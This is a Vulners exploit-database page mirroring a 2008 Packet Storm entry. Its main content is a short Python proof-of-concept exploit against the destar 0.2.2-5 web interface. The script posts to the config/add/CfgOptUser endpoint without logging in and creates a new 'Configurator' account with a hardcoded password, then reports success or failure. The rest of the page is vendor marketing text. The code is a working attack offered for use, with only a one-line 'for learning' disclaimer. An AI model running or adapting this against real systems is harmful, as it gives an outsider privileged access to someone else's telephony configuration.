Lucene search
K

exploit_code.py.txt

🗓️ 24 Mar 2008 00:00:00Reported by Fernando Quintero aka nonrootType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 26 Views

Exploit for destar 0.2.2-5, tested on Linux Debian. Bug found and exploit coded by a non root user. Create new user with specific information using urllib and urllib2 on target host

Code
`#  
#!/usr/bin/python  
#  
# Exploit for destar 0.2.2-5, tested on Linux Debian  
#  
# Bug found and exploit coded by a non root user  
#  
# http://nonroot.blogspot.com  
#  
# Enero 2008  
#  
# This is a PoC, please use it just for learning how to exploit something  
#  
# use: $python ./exploit_code.py  
#  
# required: urllib,urllib2 sys and re  
#  
import urllib,urllib2  
import sys,re  
print "Target host: i.e: http://127.0.0.1:8080/"  
host=raw_input("Target host ( include http and /): ")  
#info for the new user  
#  
user='mama'  
password='mama'  
source_ip='127.0.0.9'  
phone=''  
level='Configurator'  
language='en'  
#  
#  
req = urllib2.Request(host)  
adduser = urllib.urlencode({'name': user, 'secret': password, 'pc' : source_ip, 'submit' : "Submit", 'phone' : phone, 'level' : level, 'language' : language})  
req.add_header('X_FORWARDED_FOR','')  
req = urllib2.Request(host+"config/add/CfgOptUser")  
r = urllib2.urlopen(req,adduser)  
data=r.read()  
lookup=re.compile("There were errors").search  
match=lookup(data)  
if not match:  
print "Ok, now go and test your user at:",host  
else:  
print "Exploit failed, sorry, go and find some new bug or check this code and fix it!"  
sys.exit(2)  
  
sys.exit(0)  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

24 Mar 2008 00:00Current
7.4High risk
Vulners AI Score7.4
26